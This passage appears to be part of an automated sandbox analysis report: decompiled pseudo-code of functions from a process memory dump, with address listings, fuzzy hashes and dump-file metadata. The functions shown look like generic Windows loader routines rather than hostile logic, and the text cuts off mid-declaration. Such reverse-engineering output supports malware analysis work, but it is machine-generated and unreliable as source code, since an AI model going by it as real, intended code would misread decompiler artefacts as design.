																		if(_t349 != 0x10b) {
																			__eflags = _t349 - 0x20b;
																			if(_t349 == 0x20b) {
																				goto L102;
																			} else {
																				_t307 = 0;
																				_v48 = 0;
																				_t216 = 0xc000007b;
																				_v36 = 0xc000007b;
																				goto L71;
																			}
																		} else {
																			L102:
																			_t307 =  *(_t306 + 0x50);
																			goto L69;
																		}
																		goto L151;
																	} else {
																		_t239 = L048EEAEA(_t290, _t290, _t356, _t366, __eflags);
																		_t307 = _t239;
																		_v60 = _t307;
																		_v48 = _t307;
																		__eflags = _t307;
																		if(_t307 != 0) {
																			L70:
																			_t216 = _v36;
																		} else {
																			_push(_t239);
																			_push(0x14);
																			_push( &_v144);
																			_push(3);
																			_push(_v44);
																			_push(0xffffffff);
																			_t319 = E04919730();
																			_v36 = _t319;
																			__eflags = _t319;
																			if(_t319 < 0) {
																				_t216 = 0xc000001f;
																				_v36 = 0xc000001f;
																				_t307 = _v60;
																			} else {
																				_t307 = _v132;
																				L69:
																				_v48 = _t307;
																				goto L70;
																			}
																		}
																	}
																}
																L71:
																_v72 = _t307;
																_v84 = _t216;
																__eflags = _t216 - 0xc000007b;
																if(_t216 == 0xc000007b) {
																	L150:
																	_v8 = 0xfffffffe;
																	_t211 = 0xc000007b;
																} else {
																	_t344 = _t290 & 0xfffffffc;
																	_v76 = _t344;
																	__eflags = _v40 - _t344;
																	if(_v40 <= _t344) {
																		goto L150;
																	} else {
																		__eflags = _t307;
																		if(_t307 == 0) {
																			L75:
																			_t217 = 0;
																			_v104 = 0;
																			__eflags = _t366;
																			if(_t366 != 0) {
																				__eflags = _t290 & 0x00000001;
																				if((_t290 & 0x00000001) != 0) {
																					_t217 = 1;
																					_v104 = 1;
																				}
																				_t290 = _v44;
																				_v52 = _t290;
																			}
																			__eflags = _t217 - 1;
																			if(_t217 != 1) {
																				_t369 = 0;
																				_t218 = _v40;
																				goto L91;
																			} else {
																				_v64 = 0;
																				E048EE9C0(1, _t290, 0, 0,  &_v64);
																				_t309 = _v64;
																				_v108 = _t309;
																				__eflags = _t309;
																				if(_t309 == 0) {
																					goto L143;
																				} else {
																					_t226 =  *(_t309 + 0x18) & 0x0000ffff;
																					__eflags = _t226 - 0x10b;
																					if(_t226 != 0x10b) {
																						__eflags = _t226 - 0x20b;
																						if(_t226 != 0x20b) {
																							goto L143;
																						} else {
																							_t371 =  *(_t309 + 0x98);
																							goto L83;
																						}
																					} else {
																						_t371 =  *(_t309 + 0x88);
																						L83:
																						__eflags = _t371;
																						if(_t371 != 0) {
																							_v80 = _t371 - _t356 + _t290;
																							_t310 = _v64;
																							_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
																							_t292 =  *(_t310 + 6) & 0x0000ffff;
																							_t311 = 0;
																							__eflags = 0;
																							while(1) {
																								_v120 = _t311;
																								_v116 = _t348;
																								__eflags = _t311 - _t292;
																								if(_t311 >= _t292) {
																									goto L143;
																								}
																								_t359 =  *((intOrPtr*)(_t348 + 0xc));
																								__eflags = _t371 - _t359;
																								if(_t371 < _t359) {
																									L98:
																									_t348 = _t348 + 0x28;
																									_t311 = _t311 + 1;
																									continue;
																								} else {
																									__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
																									if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
																										goto L98;
																									} else {
																										__eflags = _t348;
																										if(_t348 == 0) {
																											goto L143;
																										} else {
																											_t218 = _v40;
																											_t312 =  *_t218;
																											__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
																											if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
																												_v100 = _t359;
																												_t360 = _v108;
																												_t372 = L048E8F44(_v108, _t312);
																												__eflags = _t372;
																												if(_t372 == 0) {
																													goto L143;
																												} else {
																													_t290 = _v52;
																													_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E04913C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
																													_t307 = _v72;
																													_t344 = _v76;
																													_t218 = _v40;
																													goto L91;
																												}
																											} else {
																												_t290 = _v52;
																												_t307 = _v72;
																												_t344 = _v76;
																												_t369 = _v80;
																												L91:
																												_t358 = _a4;
																												__eflags = _t358;
																												if(_t358 == 0) {
																													L95:
																													_t308 = _a8;
																													__eflags = _t308;
																													if(_t308 != 0) {
																														 *_t308 =  *((intOrPtr*)(_v40 + 4));
																													}
																													_v8 = 0xfffffffe;
																													_t211 = _v84;
																												} else {
																													_t370 =  *_t218 - _t369 + _t290;
																													 *_t358 = _t370;
																													__eflags = _t370 - _t344;
																													if(_t370 <= _t344) {
																														L149:
																														 *_t358 = 0;
																														goto L150;
																													} else {
																														__eflags = _t307;
																														if(_t307 == 0) {
																															goto L95;
																														} else {
																															__eflags = _t370 - _t344 + _t307;
																															if(_t370 >= _t344 + _t307) {
																																goto L149;
																															} else {
																																goto L95;
																															}
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																								goto L97;
																							}
																						}
																						goto L143;
																					}
																				}
																			}
																		} else {
																			__eflags = _v40 - _t307 + _t344;
																			if(_v40 >= _t307 + _t344) {
																				goto L150;
																			} else {
																				goto L75;
																			}
																		}
																	}
																}
															}
															L97:
															 *[fs:0x0] = _v20;
															return _t211;
														}
													}
												}
											}
										} else {
											goto L46;
										}
									}
								}
								goto L151;
							}
							_t288 = _v164;
							_t366 = 0xc0000135;
							goto L41;
						}
					}
				}
				L151:
			}

0x048ed5f2
0x048ed5f5
0x048ed5f5
0x048ed5fd
0x048ed600
0x048ed60a
0x048ed60d
0x048ed617
0x048ed61d
0x048ed627
0x048ed62e
0x048ed911
0x048ed913
0x00000000
0x048ed919
0x048ed919
0x048ed919
0x048ed634
0x048ed634
0x048ed634
0x048ed634
0x048ed640
0x048ed8bf
0x00000000
0x048ed646
0x048ed646
0x048ed64d
0x048ed652
0x0493b2fc
0x0493b2fc
0x0493b302
0x0493b33b
0x0493b341
0x00000000
0x0493b304
0x0493b304
0x0493b319
0x0493b31e
0x0493b324
0x0493b326
0x0493b332
0x0493b347
0x0493b34c
0x0493b351
0x0493b35a
0x00000000
0x0493b328
0x0493b328
0x00000000
0x0493b328
0x0493b326
0x048ed658
0x048ed658
0x048ed65b
0x048ed665
0x00000000
0x048ed66b
0x048ed66b
0x048ed66b
0x048ed66b
0x048ed66d
0x048ed672
0x048ed67a
0x00000000
0x00000000
0x048ed680
0x048ed686
0x048ed8ce
0x048ed8d4
0x048ed8da
0x048ed8dd
0x048ed8dd
0x048ed8e0
0x048ed68c
0x048ed691
0x048ed69d
0x048ed6a2
0x048ed6a7
0x048ed6b0
0x048ed6b0
0x048ed6b5
0x048ed6e0
0x048ed6b7
0x048ed6b7
0x048ed6b9
0x048ed6b9
0x048ed6bb
0x048ed6bd
0x048ed6ce
0x048ed6d0
0x048ed6d2
0x0493b363
0x0493b365
0x00000000
0x0493b36b
0x00000000
0x0493b36b
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x048ed6bf
0x048ed6bf
0x048ed6e5
0x048ed6e7
0x048ed6e9
0x048ed6e9
0x048ed6ec
0x048ed6ec
0x048ed6ef
0x048ed6f5
0x048ed6f9
0x048ed6fb
0x048ed6fd
0x048ed701
0x048ed703
0x048ed70a
0x048ed70a
0x048ed70a
0x048ed701
0x048ed70d
0x048ed710
0x048ed710
0x048ed6c1
0x048ed6c1
0x048ed6c1
0x048ed6c6
0x0493b36d
0x0493b36f
0x00000000
0x0493b375
0x0493b375
0x0493b375
0x00000000
0x0493b375
0x00000000
0x048ed6cc
0x048ed6d8
0x048ed6d8
0x048ed6d8
0x00000000
0x048ed6c6
0x048ed6bf
0x00000000
0x048ed6da
0x048ed6da
0x048ed716
0x048ed71b
0x048ed720
0x048ed726
0x048ed726
0x048ed72d
0x00000000
0x048ed733
0x048ed739
0x048ed742
0x048ed750
0x048ed758
0x048ed764
0x048ed776
0x048ed77a
0x048ed783
0x048ed928
0x048ed92c
0x048ed93d
0x048ed944
0x048ed94f
0x048ed954
0x048ed956
0x048ed95f
0x048ed961
0x048ed973
0x048ed973
0x048ed956
0x048ed944
0x048ed92c
0x048ed78b
0x0493b394
0x048ed791
0x048ed798
0x0493b3a3
0x0493b3bb
0x0493b3bb
0x048ed7a5
0x048ed866
0x048ed870
0x048ed884
0x048ed892
0x048ed898
0x048ed89e
0x048ed8a0
0x048ed8a6
0x048ed8ac
0x048ed8ae
0x048ed8b4
0x048ed8b4
0x048ed8ae
0x048ed7a5
0x048ed78b
0x048ed7b1
0x0493b3c5
0x0493b3c5
0x048ed7c3
0x048ed7ca
0x048ed7e5
0x048ed7eb
0x048ed8eb
0x048ed8ed
0x00000000
0x048ed8f3
0x048ed8f3
0x048ed8f3
0x00000000
0x048ed8ed
0x048ed7cc
0x048ed7cc
0x048ed7d2
0x00000000
0x048ed7d4
0x048ed7d4
0x048ed7d7
0x048ed7df
0x0493b3d4
0x0493b3d9
0x0493b3dc
0x0493b3dc
0x0493b3df
0x0493b3e2
0x0493b468
0x0493b46d
0x0493b46f
0x0493b46f
0x0493b475
0x048ed8f8
0x048ed8f9
0x048ed8fd
0x0493b3e8
0x0493b3e8
0x0493b3eb
0x0493b3ed
0x00000000
0x0493b3ef
0x0493b3ef
0x0493b3f1
0x0493b3f4
0x0493b3fe
0x0493b404
0x0493b409
0x0493b40e
0x0493b410
0x0493b410
0x0493b414
0x0493b414
0x0493b41b
0x0493b420
0x0493b423
0x0493b425
0x0493b427
0x0493b42a
0x0493b42d
0x0493b42d
0x0493b42a
0x0493b432
0x0493b436
0x0493b438
0x0493b43b
0x0493b43b
0x0493b449
0x0493b44e
0x0493b454
0x0493b458
0x0493b458
0x0493b45d
0x00000000
0x0493b45d
0x0493b3ed
0x00000000
0x00000000
0x00000000
0x048ed7df
0x048ed7d2
0x048ed7ca
0x0493b37c
0x0493b37e
0x0493b385
0x0493b38a
0x00000000
0x0493b38a
0x048ed742
0x048ed7f1
0x048ed7f8
0x0493b49b
0x0493b49b
0x048ed800
0x048ed837
0x048ed843
0x048ed845
0x048ed847
0x048ed84a
0x048ed84b
0x048ed84e
0x048ed857
0x048ed802
0x048ed802
0x048ed80d
0x00000000
0x048ed818
0x048ed818
0x048ed824
0x048ed831
0x0493b4a5
0x0493b4ab
0x0493b4b3
0x0493b4b8
0x0493b4bb
0x00000000
0x0493b4c1
0x0493b4c1
0x0493b4c8
0x00000000
0x0493b4ce
0x0493b4d4
0x0493b4e1
0x0493b4e3
0x0493b4e5
0x00000000
0x0493b4eb
0x0493b4f0
0x0493b4f2
0x048edac9
0x048edacc
0x048edacf
0x048edad1
0x048edd78
0x048edd78
0x048edcf2
0x00000000
0x048edad7
0x048edad9
0x048edadb
0x00000000
0x00000000
0x048edae1
0x048edae1
0x048edae4
0x048edae6
0x0493b4f9
0x0493b4f9
0x0493b500
0x048edaec
0x048edaec
0x048edaf5
0x048edaf8
0x048edafb
0x048edb03
0x048edb11
0x048edb16
0x048edb19
0x048edb1b
0x0493b52c
0x0493b531
0x0493b534
0x048edb21
0x048edb21
0x048edb24
0x048edcd9
0x048edce2
0x048edce5
0x048edd6a
0x048edd6d
0x00000000
0x048edd73
0x0493b51a
0x0493b51c
0x0493b51f
0x0493b524
0x00000000
0x0493b524
0x048edce7
0x048edce7
0x048edce7
0x00000000
0x048edce7
0x00000000
0x048edb2a
0x048edb2c
0x048edb31
0x048edb33
0x048edb36
0x048edb39
0x048edb3b
0x048edb66
0x048edb66
0x048edb3d
0x048edb3d
0x048edb3e
0x048edb46
0x048edb47
0x048edb49
0x048edb4c
0x048edb53
0x048edb55
0x048edb58
0x048edb5a
0x0493b50a
0x0493b50f
0x0493b512
0x048edb60
0x048edb60
0x048edb63
0x048edb63
0x00000000
0x048edb63
0x048edb5a
0x048edb3b
0x048edb24
0x048edb69
0x048edb69
0x048edb6c
0x048edb6f
0x048edb74
0x0493b557
0x0493b557
0x0493b55e
0x048edb7a
0x048edb7c
0x048edb7f
0x048edb82
0x048edb85
0x00000000
0x048edb8b
0x048edb8b
0x048edb8d
0x048edb9b
0x048edb9b
0x048edb9d
0x048edba0
0x048edba2
0x048edba4
0x048edba7
0x048edba9
0x048edbae
0x048edbae
0x048edbb1
0x048edbb4
0x048edbb4
0x048edbb7
0x048edbba
0x048edcd2
0x048edcd4
0x00000000
0x048edbc0
0x048edbc0
0x048edbd2
0x048edbd7
0x048edbda
0x048edbdd
0x048edbdf
0x00000000
0x048edbe5
0x048edbe5
0x048edbee
0x048edbf1
0x0493b541
0x0493b544
0x00000000
0x0493b546
0x0493b546
0x00000000
0x0493b546
0x048edbf7
0x048edbf7
0x048edbfd
0x048edbfd
0x048edbff
0x048edc0b
0x048edc15
0x048edc1b
0x048edc1d
0x048edc21
0x048edc21
0x048edc23
0x048edc23
0x048edc26
0x048edc29
0x048edc2b
0x00000000
0x00000000
0x048edc31
0x048edc34
0x048edc36
0x048edcbf
0x048edcbf
0x048edcc2
0x00000000
0x048edc3c
0x048edc41
0x048edc43
0x00000000
0x048edc45
0x048edc45
0x048edc47
0x00000000
0x048edc4d
0x048edc4d
0x048edc50
0x048edc52
0x048edc55
0x048edcfa
0x048edcfe
0x048edd08
0x048edd0a
0x048edd0c
0x00000000
0x048edd12
0x048edd15
0x048edd2d
0x048edd2f
0x048edd32
0x048edd35
0x00000000
0x048edd35
0x048edc5b
0x048edc5b
0x048edc5e
0x048edc61
0x048edc64
0x048edc67
0x048edc67
0x048edc6a
0x048edc6c
0x048edc8e
0x048edc8e
0x048edc91
0x048edc93
0x048edcce
0x048edcce
0x048edc95
0x048edc9c
0x048edc6e
0x048edc72
0x048edc75
0x048edc77
0x048edc79
0x0493b551
0x0493b551
0x00000000
0x048edc7f
0x048edc7f
0x048edc81
0x00000000
0x048edc83
0x048edc86
0x048edc88
0x00000000
0x00000000
0x00000000
0x00000000
0x048edc88
0x048edc81
0x048edc79
0x048edc6c
0x048edc55
0x048edc47
0x048edc43
0x00000000
0x048edc36
0x048edc23
0x00000000
0x048edbff
0x048edbf1
0x048edbdf
0x048edb8f
0x048edb92
0x048edb95
0x00000000
0x00000000
0x00000000
0x00000000
0x048edb95
0x048edb8d
0x048edb85
0x048edb74
0x048edc9f
0x048edca2
0x048edcb0
0x048edcb0
0x048edad1
0x0493b4e5
0x0493b4c8
0x00000000
0x00000000
0x00000000
0x048ed831
0x048ed80d
0x00000000
0x048ed800
0x0493b47f
0x0493b485
0x00000000
0x0493b485
0x048ed665
0x048ed652
0x00000000

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8985005623c4c5ea616a31c1ea333841c99a6b1238379bfab334d1974e2f70ac
Instruction ID: 7c05cfd08039b60366fcdc9ed9e9afbfbf9ecba1d484d06a5f4f799eb4393070
Opcode Fuzzy Hash: 8985005623c4c5ea616a31c1ea333841c99a6b1238379bfab334d1974e2f70ac
Instruction Fuzzy Hash: 63E1D230A0436ACFEB24DF19C844B79B7F6BF86308F0446A9D90997291D774BD85CB52

Uniqueness

Uniqueness Score: -1.00%

Function 048E849B, Relevance: .3, Instructions: 290
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E048E849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
				void* _t136;
				signed int _t139;
				signed int _t141;
				signed int _t145;
				intOrPtr _t146;
				signed int _t149;
				signed int _t150;
				signed int _t161;
				signed int _t163;
				signed int _t165;
				signed int _t169;
				signed int _t171;
				signed int _t194;
				signed int _t200;
				void* _t201;
				signed int _t204;
				signed int _t206;
				signed int _t210;
				signed int _t214;
				signed int _t215;
				signed int _t218;
				void* _t221;
				signed int _t224;
				signed int _t226;
				intOrPtr _t228;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				void* _t237;
				void* _t238;

				_t236 = __esi;
				_t235 = __edi;
				_t193 = __ebx;
				_push(0x70);
				_push(0x49af9c0);
				E0492D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
				if( *0x49c7b04 == 0) {
					L4:
					goto L5;
				} else {
					_t136 = E048ECEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
					_t236 = 0;
					if(_t136 < 0) {
						 *((intOrPtr*)(_t237 - 0x54)) = 0;
					}
					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
						_t193 =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x68) = _t236;
						 *(_t237 - 0x6c) = _t236;
						_t235 = _t236;
						 *(_t237 - 0x60) = _t236;
						E048F2280( *[fs:0x30], 0x49c8550);
						_t139 =  *0x49c7b04; // 0x1
						__eflags = _t139 - 1;
						if(__eflags != 0) {
							_t200 = 0xc;
							_t201 = _t237 - 0x40;
							_t141 = E0490F3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
							 *(_t237 - 0x44) = _t141;
							__eflags = _t141;
							if(_t141 < 0) {
								L50:
								E048EFFB0(_t193, _t235, 0x49c8550);
								L5:
								return E0492D130(_t193, _t235, _t236);
							}
							_push(_t201);
							_t221 = 0x10;
							_t202 =  *(_t237 - 0x40);
							_t145 = E048D1C45( *(_t237 - 0x40), _t221);
							 *(_t237 - 0x44) = _t145;
							__eflags = _t145;
							if(_t145 < 0) {
								goto L50;
							}
							_t146 =  *0x49c7b9c; // 0x0
							_t235 = L048F4620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
							 *(_t237 - 0x60) = _t235;
							__eflags = _t235;
							if(_t235 == 0) {
								_t149 = 0xc0000017;
								 *(_t237 - 0x44) = 0xc0000017;
							} else {
								_t149 =  *(_t237 - 0x44);
							}
							__eflags = _t149;
							if(__eflags >= 0) {
								L8:
								 *(_t237 - 0x64) = _t235;
								_t150 =  *0x49c7b10; // 0x10
								 *(_t237 - 0x4c) = _t150;
								_t193 = E0490A61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags, _t237 - 0x58, _t237 - 0x39, _t237 - 0x74);
								 *(_t237 - 0x44) = _t193;
								__eflags = _t193;
								if(_t193 < 0) {
									L30:
									E048EFFB0(_t193, _t235, 0x49c8550);
									__eflags = _t235 - _t237 - 0x38;
									if(_t235 != _t237 - 0x38) {
										_t235 =  *(_t237 - 0x48);
										L048F77F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
									} else {
										_t235 =  *(_t237 - 0x48);
									}
									__eflags =  *(_t237 - 0x6c);
									if( *(_t237 - 0x6c) != 0) {
										L048F77F0(_t235, _t236,  *(_t237 - 0x6c));
									}
									__eflags = _t193;
									if(_t193 >= 0) {
										goto L4;
									} else {
										goto L5;
									}
								}
								_t204 =  *0x49c7b04; // 0x1
								 *(_t235 + 8) = _t204;
								__eflags =  *((char*)(_t237 - 0x39));
								if( *((char*)(_t237 - 0x39)) != 0) {
									 *(_t235 + 4) = 1;
									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
									_t161 =  *0x49c7b10; // 0x10
									 *(_t237 - 0x4c) = _t161;
								} else {
									 *(_t235 + 4) = _t236;
									 *(_t235 + 0xc) =  *(_t237 - 0x58);
								}
								 *((intOrPtr*)(_t237 - 0x54)) = E049137C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
								_t224 = _t236;
								 *(_t237 - 0x40) = _t236;
								 *(_t237 - 0x50) = _t236;
								while(1) {
									_t163 =  *(_t235 + 8);
									__eflags = _t224 - _t163;
									if(_t224 >= _t163) {
										break;
									}
									_t228 =  *0x49c7b9c; // 0x0
									_t214 = L048F4620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
									 *(_t237 - 0x78) = _t214;
									__eflags = _t214;
									if(_t214 == 0) {
										L52:
										_t193 = 0xc0000017;
										L19:
										 *(_t237 - 0x44) = _t193;
										L20:
										_t206 =  *(_t237 - 0x40);
										__eflags = _t206;
										if(_t206 == 0) {
											L26:
											__eflags = _t193;
											if(_t193 < 0) {
												E049137F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) != 0) {
													 *0x49c7b10 =  *0x49c7b10 - 8;
												}
											} else {
												_t169 =  *(_t237 - 0x68);
												__eflags = _t169;
												if(_t169 != 0) {
													 *0x49c7b04 =  *0x49c7b04 - _t169;
												}
											}
											__eflags = _t193;
											if(_t193 >= 0) {
												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
											}
											goto L30;
										}
										_t226 = _t206 * 0xc;
										__eflags = _t226;
										_t194 =  *(_t237 - 0x48);
										do {
											 *(_t237 - 0x40) = _t206 - 1;
											_t226 = _t226 - 0xc;
											 *(_t237 - 0x4c) = _t226;
											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
													__eflags =  *((char*)(_t237 - 0x39));
													if( *((char*)(_t237 - 0x39)) == 0) {
														_t171 = _t210;
													} else {
														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
														L048F77F0(_t194, _t236, _t210 - 8);
														_t171 =  *(_t237 - 0x50);
													}
													L48:
													L048F77F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
													L46:
													_t206 =  *(_t237 - 0x40);
													_t226 =  *(_t237 - 0x4c);
													goto L24;
												}
												 *0x49c7b08 =  *0x49c7b08 + 1;
												goto L24;
											}
											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
											__eflags = _t171;
											if(_t171 != 0) {
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) == 0) {
													goto L48;
												}
												E049157C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
												goto L46;
											}
											L24:
											__eflags = _t206;
										} while (_t206 != 0);
										_t193 =  *(_t237 - 0x44);
										goto L26;
									}
									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
									 *(_t237 - 0x7c) = _t232;
									 *(_t232 - 4) = _t214;
									 *(_t237 - 4) = _t236;
									E0491F3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
									_t238 = _t238 + 0xc;
									 *(_t237 - 4) = 0xfffffffe;
									_t215 =  *(_t237 - 0x48);
									__eflags = _t193;
									if(_t193 < 0) {
										L048F77F0(_t215, _t236,  *(_t237 - 0x78));
										goto L20;
									}
									__eflags =  *((char*)(_t237 - 0x39));
									if( *((char*)(_t237 - 0x39)) != 0) {
										_t233 = E0490A44B( *(_t237 - 0x4c));
										 *(_t237 - 0x50) = _t233;
										__eflags = _t233;
										if(_t233 == 0) {
											L048F77F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
											goto L52;
										}
										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
										L17:
										_t234 =  *(_t237 - 0x40);
										_t218 = _t234 * 0xc;
										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
										 *(_t218 + _t235 + 0x10) = _t236;
										_t224 = _t234 + 1;
										 *(_t237 - 0x40) = _t224;
										 *(_t237 - 0x50) = _t224;
										_t193 =  *(_t237 - 0x44);
										continue;
									}
									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
									goto L17;
								}
								 *_t235 = _t236;
								_t165 = 0x10 + _t163 * 0xc;
								__eflags = _t165;
								_push(_t165);
								_push(_t235);
								_push(0x23);
								_push(0xffffffff);
								_t193 = E049196C0();
								goto L19;
							} else {
								goto L50;
							}
						}
						_t235 = _t237 - 0x38;
						 *(_t237 - 0x60) = _t235;
						goto L8;
					}
					goto L4;
				}
			}

0x048e849b
0x048e849b
0x048e849b
0x048e849b
0x048e849d
0x048e84a2
0x048e84a7
0x048e84b1
0x048e84d8
0x00000000
0x048e84b3
0x048e84c4
0x048e84c9
0x048e84cd
0x048e84cf
0x048e84cf
0x048e84d6
0x048e84e6
0x048e84e9
0x048e84ec
0x048e84ef
0x048e84f2
0x048e84f4
0x048e84fc
0x048e8501
0x048e8506
0x048e8509
0x048e86e0
0x048e86e5
0x048e86e8
0x048e86ed
0x048e86f0
0x048e86f2
0x04939afd
0x04939b02
0x048e84da
0x048e84df
0x048e84df
0x048e86fa
0x048e86fd
0x048e86fe
0x048e8701
0x048e8706
0x048e8709
0x048e870b
0x00000000
0x00000000
0x048e8711
0x048e8725
0x048e8727
0x048e872a
0x048e872c
0x04939af0
0x04939af5
0x048e8732
0x048e8732
0x048e8732
0x048e8735
0x048e8737
0x048e8515
0x048e8515
0x048e8518
0x048e851d
0x048e8537
0x048e8539
0x048e853c
0x048e853e
0x048e868c
0x048e8691
0x048e8699
0x048e869b
0x048e8744
0x048e8748
0x048e86a1
0x048e86a1
0x048e86a1
0x048e86a4
0x048e86a8
0x04939bdf
0x04939bdf
0x048e86ae
0x048e86b0
0x00000000
0x048e86b6
0x00000000
0x04939be9
0x048e86b0
0x048e8544
0x048e854a
0x048e854d
0x048e8551
0x048e876e
0x048e8778
0x048e877b
0x048e8780
0x048e8557
0x048e8557
0x048e855d
0x048e855d
0x048e856b
0x048e856e
0x048e8570
0x048e8573
0x048e8576
0x048e8576
0x048e8579
0x048e857b
0x00000000
0x00000000
0x048e8581
0x048e85a0
0x048e85a2
0x048e85a5
0x048e85a7
0x04939b1b
0x04939b1b
0x048e862e
0x048e862e
0x048e8631
0x048e8631
0x048e8634
0x048e8636
0x048e8669
0x048e8669
0x048e866b
0x04939bbf
0x04939bc4
0x04939bc8
0x04939bce
0x04939bce
0x048e8671
0x048e8671
0x048e8674
0x048e8676
0x04939bae
0x04939bae
0x048e8676
0x048e867c
0x048e867e
0x048e8688
0x048e8688
0x00000000
0x048e867e
0x048e8638
0x048e8638
0x048e863b
0x048e863e
0x048e863f
0x048e8642
0x048e8645
0x048e8648
0x048e864d
0x04939b69
0x04939b6e
0x04939b7b
0x04939b81
0x04939b85
0x04939b89
0x04939ba7
0x04939b8b
0x04939b91
0x04939b9a
0x04939b9f
0x04939b9f
0x048e8788
0x048e878d
0x048e8763
0x048e8763
0x048e8766
0x00000000
0x048e8766
0x04939b70
0x00000000
0x04939b70
0x048e8656
0x048e865a
0x048e865c
0x048e8752
0x048e8756
0x00000000
0x00000000
0x048e875e
0x00000000
0x048e875e
0x048e8662
0x048e8662
0x048e8662
0x048e8666
0x00000000
0x048e8666
0x048e85b7
0x048e85b9
0x048e85bc
0x048e85bf
0x048e85cc
0x048e85d1
0x048e85d4
0x048e85db
0x048e85de
0x048e85e0
0x04939b5f
0x00000000
0x04939b5f
0x048e85e6
0x048e85ea
0x048e86c3
0x048e86c5
0x048e86c8
0x048e86ca
0x04939b16
0x00000000
0x04939b16
0x048e86d6
0x048e85f6
0x048e85f6
0x048e85f9
0x048e8602
0x048e8606
0x048e860a
0x048e860b
0x048e860e
0x048e8611
0x00000000
0x048e8611
0x048e85f3
0x00000000
0x048e85f3
0x048e8619
0x048e861e
0x048e861e
0x048e8621
0x048e8622
0x048e8623
0x048e8625
0x048e862c
0x00000000
0x048e873d
0x00000000
0x048e873d
0x048e8737
0x048e850f
0x048e8512
0x00000000
0x048e8512
0x00000000
0x048e84d6

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf62cab3c9769195a737fd0e29093f6d25591ab7fb5d5f38ea3827f5985d2484
Instruction ID: 337ad9edd89f67f9882215b0c87c50ea393e1bd5e859ce777c8982200ed8ee65
Opcode Fuzzy Hash: cf62cab3c9769195a737fd0e29093f6d25591ab7fb5d5f38ea3827f5985d2484
Instruction Fuzzy Hash: 6DB13BB0E00209DFDB14DF9AC984AADBBB5FF86308F104A69E515EB255D770B941CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0490513A, Relevance: .3, Instructions: 258
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E0490513A(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				signed char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v63;
				char _v64;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed char* _v92;
				signed int _v100;
				signed int _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t157;
				signed int _t159;
				signed int _t160;
				unsigned int* _t161;
				intOrPtr _t165;
				signed int _t172;
				signed char* _t181;
				intOrPtr _t189;
				intOrPtr* _t200;
				signed int _t202;
				signed int _t203;
				char _t204;
				signed int _t207;
